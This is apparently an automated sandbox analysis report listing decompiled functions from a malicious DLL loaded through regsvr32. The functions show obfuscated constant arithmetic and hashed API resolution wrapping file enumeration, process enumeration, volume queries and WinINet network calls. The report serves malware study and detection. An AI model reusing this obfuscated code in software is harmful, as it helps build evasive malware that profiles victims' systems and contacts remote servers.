				_v12 = _v12 ^ 0xb30525ed;
				_v12 = _v12 ^ 0xb30c650d;
				_v16 = 0x148fca;
				_v16 = _v16 | 0x9ebfe94d;
				_v16 = _v16 ^ 0x9ebbfe12;
				_v8 = 0xe31269;
				_t55 = 0x2f;
				_v8 = _v8 / _t55;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0x00455aa6;
				E1001BFF0(0xac802c42, 0x211, _t55, _t55, 0xac6ab1cc);
				_t52 = FindNextFileW(_a12, _t62); // executed
				return _t52;
			}

0x1000fa73
0x1000fa76
0x1000fa78
0x1000fa7b
0x1000fa7e
0x1000fa80
0x1000fa85
0x1000fa8e
0x1000fa95
0x1000fa9c
0x1000faa8
0x1000faad
0x1000fab2
0x1000fab9
0x1000fac0
0x1000fac7
0x1000face
0x1000fad5
0x1000fadf
0x1000fae5
0x1000fae8
0x1000faec
0x1000fb10
0x1000fb1c
0x1000fb22

APIs

FindNextFileW.KERNEL32(D57F8140,?,?,?,?,?,?,?,?,10016278,00000048), ref: 1000FB1C

Strings

4B`, xrefs: 1000FA85

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID: 4B`
API String ID: 2029273394-1407113345
Opcode ID: eeb7b99edd824aa1e09e3faeca9507683dd9cf704a8456d5670e294eba2c0007
Instruction ID: 57278409259eeac82e523a8e815097e033d8b2c64113a28108e522d0767fcf83
Opcode Fuzzy Hash: eeb7b99edd824aa1e09e3faeca9507683dd9cf704a8456d5670e294eba2c0007
Instruction Fuzzy Hash: 23112375D00208EBDB08DFA5CC4A8EEBFB5FF40310F108199A925A6261D7B19B608B90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E1001BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 1001AA4C

Strings

ijp, xrefs: 1001A9EB

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: c4ae01a746b57b100e0f3fae86904e2812b46ac90703bfed0e9bbf53163d9d60
Instruction ID: 08d8414517ae60290be451ade77ec7b27b58724690d5fe81316851794a35ed95
Opcode Fuzzy Hash: c4ae01a746b57b100e0f3fae86904e2812b46ac90703bfed0e9bbf53163d9d60
Instruction Fuzzy Hash: D62117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C199E404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 10011A72 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10011A72(void* __ecx, struct tagPROCESSENTRY32W* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t49;
				signed int _t51;
				struct tagPROCESSENTRY32W* _t56;

				_push(_a8);
				_t56 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t40);
				_v20 = 0x7b9b71;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x0002374b;
				_v16 = 0x6b840c;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x000b698e;
				_v12 = 0x794162;
				_v12 = _v12 + 0xf539;
				_t51 = 0x44;
				_v12 = _v12 * 0x62;
				_v12 = _v12 ^ 0x2ec9eacb;
				_v8 = 0xf9a10c;
				_v8 = _v8 << 0xd;
				_v8 = _v8 / _t51;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x0629d462;
				_t49 = E1001BFF0(0xac802c42, 0x235, _t51, _t51, 0x11daef56);
				Process32FirstW(_a4, _t56); // executed
				return _t49;
			}

0x10011a79
0x10011a7c
0x10011a7e
0x10011a81
0x10011a82
0x10011a83
0x10011a88
0x10011a91
0x10011a95
0x10011a9c
0x10011aa3
0x10011aa7
0x10011aab
0x10011ab2
0x10011ab9
0x10011ac6
0x10011aca
0x10011acd
0x10011ad4
0x10011adb
0x10011ae9
0x10011aec
0x10011af0
0x10011b0f
0x10011b1b
0x10011b21

APIs

Process32FirstW.KERNEL32(2EC9EACB,?,?,?,?,?,?,?,?,00000000), ref: 10011B1B

Strings

bAy, xrefs: 10011AB2

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID: bAy
API String ID: 2623510744-1957261696
Opcode ID: 007cc0eeb5f3c7e1ee999575360f5430bab27eeb931e45f6631d1a3e29bee27c
Instruction ID: 2c3b21ad71254afaaa33a7c1d1f4f583ef6aba1efea90709bd985d84c8636005
Opcode Fuzzy Hash: 007cc0eeb5f3c7e1ee999575360f5430bab27eeb931e45f6631d1a3e29bee27c
Instruction Fuzzy Hash: B61134B5D0021CFBDB08DFA4D94A8DEBBB4EB50308F108198E9256B250D3B89B54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E10009E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E1001BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

APIs

CloseHandle.KERNEL32(58672764,?,?,?,?,?,?,?,58672764), ref: 1001E42F

Strings

M8, xrefs: 1001E3ED

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 86e2d1d34bfd50fef975cc10c15b89ae96c77ee188b57b48a94089a5f1c9e2ff
Instruction ID: eb367e5f18db3a68d22521a23e7b1cd58748ba1d5980e3efdeacfb35b3ff9a68
Opcode Fuzzy Hash: 86e2d1d34bfd50fef975cc10c15b89ae96c77ee188b57b48a94089a5f1c9e2ff
Instruction Fuzzy Hash: 991129B5D00209EFDF58CFE4C94989EBBB4EB40324F108299E824B6291D7B55B059F91

Uniqueness

Uniqueness Score: -1.00%

Function 1001683F Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E1001683F(void* __ecx, void* __edx, intOrPtr _a4, long _a8, WCHAR* _a12, DWORD* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t51;
				int _t60;

				_push(0);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t51);
				_v16 = 0x42e80;
				_v16 = _v16 + 0xffff7eb4;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 | 0x11194876;
				_v16 = _v16 ^ 0x111022fe;
				_v20 = 0xdfe9dc;
				_v20 = _v20 * 0xb;
				_v20 = _v20 ^ 0x0992d214;
				_v12 = 0xfd6959;
				_v12 = _v12 + 0x7d2;
				_v12 = _v12 + 0xffff7a04;
				_v12 = _v12 + 0xffff8ddd;
				_v12 = _v12 ^ 0x00ffb78b;
				_v8 = 0x12ec7d;
				_v8 = _v8 * 0x59;
				_v8 = _v8 + 0x4d6;
				_v8 = _v8 + 0x7165;
				_v8 = _v8 ^ 0x069adeb4;
				E1001BFF0(0xac802c42, 0x11a, __ecx, __ecx, 0xf7b47798);
				_t60 = GetVolumeInformationW(_a12, 0, _a36, _a20, 0, 0, 0, _a8); // executed
				return _t60;
			}

0x10016848
0x10016849
0x1001684c
0x1001684d
0x10016850
0x10016851
0x10016854
0x10016857
0x1001685a
0x1001685d
0x10016860
0x10016861
0x10016864
0x10016867
0x1001686b
0x1001686c
0x10016871
0x1001687b
0x10016882
0x10016886
0x1001688d
0x10016894
0x100168ab
0x100168b3
0x100168ba
0x100168c1
0x100168c8
0x100168cf
0x100168d6
0x100168dd
0x100168e8
0x100168eb
0x100168f2
0x100168f9
0x1001690c
0x10016924
0x1001692a

APIs

GetVolumeInformationW.KERNEL32(0992D214,00000000,?,00000000,00000000,00000000,00000000,111022FE), ref: 10016924

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 89625cad213fbb906bcdf6664bc7d038f6728563ce33cd94274248bc5553916b
Instruction ID: 58ba551a152957501df4792275bac2ee3c6dde34ed051ab65e3c4fad12ebce6d
Opcode Fuzzy Hash: 89625cad213fbb906bcdf6664bc7d038f6728563ce33cd94274248bc5553916b
Instruction Fuzzy Hash: 9721FDB2801219BBCF51CFA5CC098DEBFB5FF18364F108188F92962260D3759A65EF90

Uniqueness

Uniqueness Score: -1.00%

Function 10005797 Relevance: 1.6, APIs: 1, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E10005797(long __ecx, void* __edx, intOrPtr _a8, signed int _a16, intOrPtr _a24, intOrPtr _a28, WCHAR* _a32, intOrPtr _a36, long _a40, intOrPtr _a44) {
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				void* _t50;
				void* _t51;
				long _t55;
				short _t56;

				_push(_a44);
				_t56 = _a16;
				_push(_a40);
				_t51 = __edx;
				_push(_a36);
				_t55 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_t56 & 0x0000ffff);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t56 & 0x0000ffff);
				_v4 = 0x58e6c8;
				_v4 = _v4 << 0xd;
				_v4 = _v4 + 0xffff72f6;
				_v4 = _v4 ^ 0x1cd0d9a4;
				_a16 = 0x942015;
				_a16 = _a16 + 0xffff1949;
				_a16 = _a16 | 0xf966dab5;
				_a16 = _a16 ^ 0xf9f94db0;
				_v8 = 0x49892;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff1cea;
				_v8 = _v8 ^ 0xfffb7521;
				_v12 = 0x8abb6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xfac5;
				_v12 = _v12 ^ 0x08a412a4;
				E1001BFF0(0x3c1c9a36, 0x118, __ecx, __ecx, 0x3747356d);
				_t50 = InternetConnectW(_t51, _a32, _t56, 0, 0, _a40, _t55, 0); // executed
				return _t50;
			}

0x1000579e
0x100057a2
0x100057a8
0x100057af
0x100057b1
0x100057b5
0x100057b7
0x100057bb
0x100057bf
0x100057c3
0x100057c4
0x100057c5
0x100057c6
0x100057ca
0x100057cb
0x100057cc
0x100057cd
0x100057d2
0x100057dd
0x100057e2
0x100057ea
0x100057f2
0x100057fa
0x10005802
0x1000580a
0x10005812
0x1000581a
0x1000581f
0x10005827
0x1000582f
0x10005837
0x1000583c
0x10005844
0x1000586d
0x10005883
0x1000588c

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,006BCB86,00000000), ref: 10005883

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 8f65bdce87e7c3c010a49a3624edeffa009af516629d65db19a1a902f84f8761
Instruction ID: 4d5c29c5d322812ba6ebcb623ecbcbc8e4b120601a9382e7806dabf9fd4c91c4
Opcode Fuzzy Hash: 8f65bdce87e7c3c010a49a3624edeffa009af516629d65db19a1a902f84f8761
Instruction Fuzzy Hash: 782124B2508345AFD754CE5ADC4986BBFE8FBD6698F41081CF68042220D372D959DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 10006505 Relevance: 1.6, APIs: 1, Instructions: 65
networkCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10006505(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24, long _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t61;

				_push(_a32);
				_t61 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t43);
				_v36 = 0x6eb8c7;
				_v32 = 0x49cc54;
				_v28 = 0x4796fb;
				_v24 = 0;
				_v12 = 0x889364;
				_v12 = _v12 << 3;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00072989;
				_v20 = 0xddde3c;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x000a9bef;
				_v8 = 0x801ece;
				_v8 = _v8 + 0xffff2ee0;
				_t55 = 0x79;
				_v8 = _v8 * 0x6a;
				_v8 = _v8 ^ 0x34b7673d;
				_v16 = 0xce959b;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x000de8a1;
				E1001BFF0(0x3c1c9a36, 6, _t55, _t55, 0xb89cc38f);
				_t53 = InternetOpenW(0, _t61, 0, 0, _a28); // executed
				return _t53;
			}

0x1000650d
0x10006512
0x10006514
0x10006517
0x1000651a
0x1000651b
0x1000651c
0x1000651d
0x10006520
0x10006524
0x10006525
0x1000652a
0x10006533
0x1000653a
0x10006541
0x10006544
0x1000654b
0x1000654f
0x10006553
0x1000655a
0x10006561
0x10006565
0x1000656c
0x10006573
0x10006580
0x10006584
0x10006587
0x1000658e
0x1000659f
0x100065a2
0x100065be
0x100065cd
0x100065d4

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,006EB8C7), ref: 100065CD

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6da1b83a3a1737b52d3993ce5efb37e28d55a5ebf94671a10bf998c3fbaac1f3
Instruction ID: e2d0570a884d3a224cb0f215d2306d064ea6f23d085e87fe3a6bce197e785f15
Opcode Fuzzy Hash: 6da1b83a3a1737b52d3993ce5efb37e28d55a5ebf94671a10bf998c3fbaac1f3
Instruction Fuzzy Hash: 5C211475D01248ABDF14DF96CC4A8EFBFB9FF88704F10818AE515A6210D3B99A05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E1001BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

APIs

CreateFileW.KERNEL32(58672764,?,00852A30,00000000,?,?,00000000), ref: 1001BFE8

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8e1b60f4b496761ad19ed88c678b0975e6bf8f26aefa1c6d777dcd54200571ce
Instruction ID: a5ad079ddfa0ac31df0ef3774d91f9d1bc30e2e7502c2c862d30a0e22a434d2f
Opcode Fuzzy Hash: 8e1b60f4b496761ad19ed88c678b0975e6bf8f26aefa1c6d777dcd54200571ce
Instruction Fuzzy Hash: DD21F47680020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10011B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E1001BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,00001000,58672764,00001000), ref: 10011BE5

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 729019e803fb878898e65827e25b508ade98bbda1d4922f5f24beb933107dc4e
Instruction ID: d0d425b45aa9a9f6d610c3e920a00689aa0f8126b2cb960a283d8320a45d68de
Opcode Fuzzy Hash: 729019e803fb878898e65827e25b508ade98bbda1d4922f5f24beb933107dc4e
Instruction Fuzzy Hash: A82132B5D00208FBDF05CFA5C94A8EEBBB5FB80314F108089E814A6261D3B4AB41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 1000400F Relevance: 1.6, APIs: 1, Instructions: 56
networkCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1000400F(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				int _t46;
				void* _t50;
				long _t51;

				_push(0xffffffff);
				_push(_a24);
				_t50 = __edx;
				_t51 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t37);
				_v8 = 0x7faaef;
				_v8 = _v8 * 0x70;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0xabaff475;
				_v8 = _v8 ^ 0x1e29df8f;
				_v20 = 0xeedcd0;
				_v20 = _v20 ^ 0xc4f4721f;
				_v20 = _v20 ^ 0xc418ed97;
				_v16 = 0xd0a365;
				_v16 = _v16 + 0xfdae;
				_v16 = _v16 ^ 0x00d2ac28;
				_v12 = 0x73320e;
				_v12 = _v12 ^ 0x2fad4864;
				_v12 = _v12 ^ 0x2fde85b2;
				E1001BFF0(0x3c1c9a36, 0x245, __ecx, __ecx, 0x67ac5cbb);
				_t46 = HttpSendRequestW(_t50, _a20, 0xffffffff, _a12, _t51); // executed
				return _t46;
			}

0x10004017
0x10004019
0x1000401c
0x1000401e
0x10004020
0x10004023
0x10004026
0x10004029
0x1000402c
0x1000402f
0x10004030
0x10004031
0x10004036
0x1000404a
0x1000405c
0x1000405f
0x10004066
0x1000406d
0x10004074
0x1000407b
0x10004082
0x10004089
0x10004090
0x10004097
0x1000409e
0x100040a5
0x100040b8
0x100040ca
0x100040d1

APIs

HttpSendRequestW.WININET(?,?,000000FF,C418ED97,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 100040CA

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 3d38a6605677251f3cfe4b19b1743847ef52a704385eb898de30fcaa068c30c4
Instruction ID: 21b4923fc7122350b18f610e615fdfc606ec74d369db56720382967531aa5443
Opcode Fuzzy Hash: 3d38a6605677251f3cfe4b19b1743847ef52a704385eb898de30fcaa068c30c4
Instruction Fuzzy Hash: 5F215871805219BFCF04CFA5CD4689EBFB5FF44350F208698F825A62A0D3719B50AF91

Uniqueness

Uniqueness Score: -1.00%

Function 100166C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100166C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E10009E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E1001BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 10016777

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: f4281d26f1589c0f866adb57fad82b6f95eb0ce95063e3981dd7b3bb33f4bea3
Instruction ID: 52e6f9726e4b7dbd304e61318c5a5b76c55d74289c49a6a1ffc23bebd90897b8
Opcode Fuzzy Hash: f4281d26f1589c0f866adb57fad82b6f95eb0ce95063e3981dd7b3bb33f4bea3
Instruction Fuzzy Hash: 861142B2800208FBCF15CFA5CC0A8DEBFB8EF85304F108198E92966210D3B19A65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
